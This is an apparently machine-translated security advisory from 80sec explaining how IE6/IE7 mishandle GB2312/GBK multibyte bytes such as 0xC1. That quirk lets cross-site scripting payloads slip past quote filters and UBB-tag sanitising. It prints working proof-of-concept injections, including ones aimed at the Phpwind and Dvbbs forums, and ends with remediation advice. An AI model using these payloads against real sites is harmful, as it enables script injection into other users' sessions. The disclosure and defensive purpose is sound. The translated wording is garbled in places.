|= ——————————————————————————————— –=|
|= ————— –=[Character set caused by browser cross-site scripting attacks]= ————— –=|
|= ——————————————————————————————— –=|
|= ————————————-=[by jianxin]= ———————————— =|
|= ——————————-=[jianxin@80sec.com]= —————————-=|
|= ———————————————————————————————— =|
< has been replaced with the document, if required, please visit the Http://www.80sec.com/release/charset-xss.txt
In general Web programs, display data to the browser will specify a character set, in the domestic usually we use the character set has utf-8,gbk,gb2312, etc., the character set indicates how the browser should treat the returned data. The gb2312 and GBK character sets are used widely, but it is proved that IE has problems in processing these wide character sets, which causes some security rules of the program to be bypass off, causing serious cross-station scripting security vulnerabilities. In IE, if it encounters a character, it is the first digit in the specified character set, it is assumed that its subsequent characters and current characters constitute a valid character, so that it will do so when parsing includes HTML tags, processing javascript,css, and the beta version is IE6 and IE7.
1 Bypass some JS inspection rules
〈html>
〈head>
〈title>80sec test〈/title>
〈meta http-equiv= "Content-type" content= "text/html; charset=gb2312 "/>
〈/head>
〈body>
〈script>
Window.onerror=function () {
Alert (' Vul ');
return true;
}
〈/script>
〈script>x= ' 〈?php Echo chr (0xC1);? > ' y= ' [user_in_put] ';〈/script>
〈/body>
〈/html>
Here even filtering the 〈> ' \ etc characters can be used to achieve the role of the illegal character set, because it will be the original existence of the ' give, and then the front of the ' can't find closure, the back [User_in_put] can be used to execute JS code.
2 Bypass check rules for certain properties
In order to avoid the vulnerability of direct use of HTML, some forums and programs use the UBB tag, but in GBK and other multibyte encodings, as easily as problems, with the most likely problem of a UBB tag as an example:
[color=xyz〈?php Echo Chr (0xC1);? >][/COLOR][COLOR=ABC Onmouseover=alert (/xss/) s=〈?php Echo chr (0xC1); >]exploited[/color]
0xc1 is the first byte of a gb2312, and the results above will be converted to:
〈font color= "Xyz?>〈/font>〈font color=" ABC Onmouseover=alert (/xss/) s=?>exploited〈/font>
Alert (/xss/) will do an event execution, so even ubb tags become unsafe and can be spared "protection." Many forums do not pay attention to this, phpwind, such as the Dynamic Network forum is vulnerable to such attacks. Discuz fixes this security issue by appending a space after the result of the transformation. The use of the UBB tag here is actually a very interesting tips in the inside, because some databases will discard characters that do not match the specified character set, so you must use the following characters to form a valid character to be stored in the database, of course, like access this will not have a problem, In other languages, the character set type of the string is enforced when the string is processed, and illegal characters can cause the transcoding to fail or be discarded, so this type of attack cannot be exploited.
3 several small examples
Phpwind Forum CharSet Cross-site scripting vulnerabilities
[Email=xxxx 羃 [/email][email=xxxx onmouseover=alert () s= 羃]fuck Me[/email]
[XXFarEastFont-0xc1]xxx[/font][url=http://onmouseover=alert ()//]xx[/url]
羃 is a special hexadecimal encoding followed by a combination of characters, the first method can be copied directly:)
0XC1 represents a hexadecimal character encoding
Also in the Dvbbs forum it is easy to generate an XSS code as follows
〈font face= "Microsoft ya 羃 >xxxxxxxxxxx〈/font>〈font face=" Onmouseover=alert () x= 羃 >xxxxxxxxxxx〈/font>
Both in the new and old editions of the test pass.
4 About Repairs
For program designers, because of the reliability of the UTF-8 character set, there is no security vulnerability, so you can consider using the UTF-8 character set when you design your site.
For the majority of developers, you can remember that the minimum input is equal to the principle of maximum security, in matching the regular time limit the range of characters entered, as far as possible to match ASCII characters, if you must use Chinese, you can consider similar to discuz in Chinese after adding space to fix the problem.
For the vast majority of users, this vulnerability because the browser processing page characters are different, you can consider using such as Firefox browser, you can avoid a part of such problems.
Site content are original, reproduced please be sure to keep the signature and link!
Browser Cross-site scripting attacks caused by character set :http://www.80sec.com/charset-xss.html
